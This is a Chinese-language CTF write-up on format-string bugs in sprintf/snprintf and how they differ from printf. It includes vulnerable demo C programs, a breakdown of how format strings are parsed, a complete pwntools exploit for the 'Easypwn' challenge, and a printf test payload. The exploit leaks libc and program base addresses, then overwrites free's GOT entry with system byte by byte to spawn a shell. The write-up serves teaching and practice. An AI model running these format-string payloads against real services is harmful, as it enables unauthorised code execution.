本文主要介绍s[n]printf的格式化字符串漏洞用法以及和printf格式化字符串漏洞的区别

s[n]printf的格式化字符串漏洞

s[n]printf函数介绍

函数原型int s[n]printf(char *str, size_t size, const char *format, ...); 作用和printf类似只不过原来输出到终端的结果会保留在str中返回值是向str中输入的字符个数 snprintf和sprintf的区别是前者限制了可写入字符数

实例

以以下代码编译出的程序为例:

#include <stdio.h>
#include <string.h>
#include <unistd.h>

void main(){
    char buf1[0x100];
    char buf3[0x20] = "%s\x00";
    char buf2[0x20];
    while(1){
        memset(buf1, 0, 0x100);
        read(0, buf1, 0x100);
        sprintf(buf2, buf3, buf1);
        puts("");
    }
}

模拟了上文提到的那种情况简单发送一个泄露RSI储存的指针的payload进行实验:

1	s(b'A' * 0x20 + b'==%p')

调用前:

调用后:

可以看到新覆盖上的格式化字符串被成功的解析了同时根据格式化字符串解析规则这段新的格式化字符串也将被复制到buf2中这也就是为什么后面会不断重复这个输出

这里再介绍一下

格式化字符串在s[n]printf中解析的规则

以这样一个格式化字符串为例: b'%s1234%567c%7$hhn'

可以将其分段成以下形式b'[%s][1234][%567c][%7$hhn]'

%s会打印第二个参数存放的指针指向的字符串
打印’1234’
输出567个空格
将上面输出的所有东西的字符数 & 0xff写入RSP指向位置存放的指针指向的内存

对新添加的格式化字符串同样适用直到被b’\x00’截断

看一道题目来加深理解

[攻防世界] Easypwn

checksec除了RELRO保护全开

伪代码:

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  int i; // [rsp+10h] [rbp-20h]
  int v5; // [rsp+14h] [rbp-1Ch]
  void *name; // [rsp+18h] [rbp-18h]
  char nptr[8]; // [rsp+20h] [rbp-10h] BYREF
  unsigned __int64 v8; // [rsp+28h] [rbp-8h]

  v8 = __readfsqword(0x28u);
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(_bss_start, 0LL, 2, 0LL);
  for ( i = 0; i <= 11; ++i )
  {
    write(1, "Input Your Code:\n", 0x11uLL);
    __isoc99_scanf("%4s", nptr);
    v5 = atoi(nptr);
    if ( v5 == 1 )
    {
      get_input();
    }
    else
    {
      if ( v5 != 2 )
        return 0LL;
      name = malloc(0x100uLL);
      write(1, "Input Your Name:\n", 0x11uLL);
      read(0, name, 0x100uLL);
      printf("OK!I Know Your Name :%sNow!", (const char *)name);
      free(name);
    }
  }
  return 0LL;
}

unsigned __int64 get_input()
{
  char s1[1024]; // [rsp+10h] [rbp-BF0h] BYREF
  char s2[1000]; // [rsp+410h] [rbp-7F0h] BYREF
  char s3[1024]; // [rsp+7F8h] [rbp-408h] BYREF
  unsigned __int64 v4; // [rsp+BF8h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  memset(s1, 0, sizeof(s1));
  memset(s3, 0, 8uLL);
  memset(s2, 0, 0x7E8uLL);
  strcpy(s3, "%s");
  puts("Welcome To WHCTF2017:");
  read(0, s1, 0x438uLL);
  snprintf(s2, 0x7D0uLL, s3, s1);
  printf("Your Input Is :%s\n", s2);
  return __readfsqword(0x28u) ^ v4;
}

明显get_input()中就有上文提到的漏洞唯一的难点就是如何利用

第一步还是先尽可能泄露能用到的值这里选择泄露libc基址和程序被载入的基址动态调试一下看看距离RSP多远即可:

def choose(c):
    sla(b'Code:\n', str(c).encode())

padding = b'1' * 1000
payload = padding + b'++|1|%397$p|2|%389$p|3|'
choose(1)
sa(b'WHCTF2017:', payload)
ru(b'0x')
leak = int(r(12), 16)
libc_base = leak - 0x20830
log.success('libc_base = %#x' % libc_base)
ru(b'0x')
leak = int(r(12), 16)
program_base = leak - 0xcf9
log.success('program_base = %#x' % program_base)

接下来的思路有几种一种是直接修改free的got表为system 然后在name中存入b’/bin/sh\x00’后free掉或者通过get_input的RBP修改main的RBP 进一步修改main的返回地址打ret2libc

但是这题限制了输入的次数所以选择改got表

那就需要往栈上写入free的got表地址而这个地址是一定会把字符串给截断的所以需要放在最后剩下的就是计算写入的实际字节与payload的关系了最后构造一个向got表写入字节的函数:

def write_byte_at(byte, addr):
    payload  = b'1' * 1000
    payload_ = f'==%{258 + byte}c%133$hhn'.encode()
    payload_ += b'=' + p64(addr)    # 这一步是为了栈对齐
    payload  += payload_
    choose(1)
    sa(b'WHCTF2017:', payload)

完整payload:

from pwn import *

context.arch = 'amd64'
elf = ELF('./pwn1')
so = ELF('./libc.so.6')
s       = lambda data               :p.send(data)
sa      = lambda delim,data         :p.sendafter(delim, data)
sl      = lambda data               :p.sendline(data)
sla     = lambda delim,data         :p.sendlineafter(delim, data)
r       = lambda num=4096           :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
itr     = lambda                    :p.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
l64     = lambda      :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
l32     = lambda      :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))

def choose(c):
    sla(b'Code:\n', str(c).encode())

def write_byte_at(byte, addr):
    payload  = b'1' * 1000
    payload_ = f'==%{258 + byte}c%133$hhn'.encode()
    payload_ += b'=' + p64(addr)
    payload  += payload_
    choose(1)
    sa(b'WHCTF2017:', payload)

# p = remote('localhost', 20000)
p = remote('61.147.171.106', xxxxx)
choose(2)
s(b'/bin/sh\x00')

padding = b'1' * 1000
# payload = padding + b'++' + '-'.join([f'|{i}|%{i}$p' for i in range(389, 392)]).encode()
payload = padding + b'++|1|%397$p|2|%389$p|3|'
choose(1)
sa(b'WHCTF2017:', payload)
ru(b'0x')
leak = int(r(12), 16)
libc_base = leak - 0x20830
log.success('libc_base = %#x' % libc_base)
ru(b'0x')
leak = int(r(12), 16)
program_base = leak - 0xcf9
log.success('program_base = %#x' % program_base)

got_free = program_base + elf.got['free']
system = libc_base + so.symbols['system']

to_write = system.to_bytes(8, 'little')[:3]
for i in range(3):
    write_byte_at(to_write[i], got_free + i)

itr()

更危险的另一个原因

实际上printf和s[n]printf在底层实现上就是不同的 s[n]printf直到上文实例中使用的代码的链接库版本glibc 2.40依然存在动态解析格式化字符串的功能而同样的链接库版本编译出的程序printf都没有这样的功能

实例

考虑以下代码编译出的程序:

#include <stdio.h>
#include <string.h>
#include <unistd.h>

void main(){
    __int64_t var1 = 0, var2 = 0;
    __int64_t *ptr1 = &var1, **ptr2 = &ptr1;
    char buf[0x100];
    while(1){
        memset(buf, 0, 0x100);
        read(0, buf, 0x100);
        printf(buf);
        puts("");
        printf("var1: %lx\nvar2: %lx\n", var1, var2);
    }
}

发送以下格式化字符串进行测试: "%88c%40$hhn%256c%38$hn" 其中%40$p为ptr2 %38$p为ptr1

期望的行为是进行格式化输出后先是通过ptr2修改了ptr1 使其指向var2 然后通过ptr1向var2中写入数据

但实际的结果是ptr1确实被修改为指向var2的指针但被写入数据的依然是var1:

执行前:

执行后:

可以看到在进行对ptr1的修改前就已经缓存了ptr1在执行前的值并在后续依然向那个保存值中写入数据

而这个特性最高在glibc 2.23仍可以被复现

Ikoct的饮冰室

s[n]printf的格式化字符串漏洞

s[n]printf的格式化字符串漏洞

s[n]printf函数介绍

更多格式化字符串漏洞的可能性

实例

格式化字符串在s[n]printf中解析的规则

[攻防世界] Easypwn

更危险的另一个原因

实例